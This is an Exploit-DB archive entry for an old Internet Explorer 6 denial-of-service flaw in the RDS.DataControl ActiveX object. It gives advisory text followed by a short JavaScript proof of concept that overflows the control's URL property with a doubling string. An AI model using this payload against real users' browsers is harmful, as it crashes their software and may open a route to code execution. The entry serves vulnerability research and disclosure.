exploit-db-mirror/exploits/windows/dos/28194.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

13 lines
No EOL
779 B
Text

source: https://www.securityfocus.com/bid/18900/info
Microsoft Internet Explorer 6 is reportedly prone to a denial-of-service vulnerability because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers.
This issue is triggered when an attacker convinces a victim to activate a malicious ActiveX control object.
Remote attackers may exploit this issue to crash Internet Explorer 6, effectively denying service to legitimate users.
A stack-based heap overflow may be possible; as a result, remote code could run in the context of the user running the affected application. This has not been confirmed.
var a = new ActiveXObject('RDS.DataControl');
var b = "X";
while (b.length < (1024*256)) a.URL = (b+=b);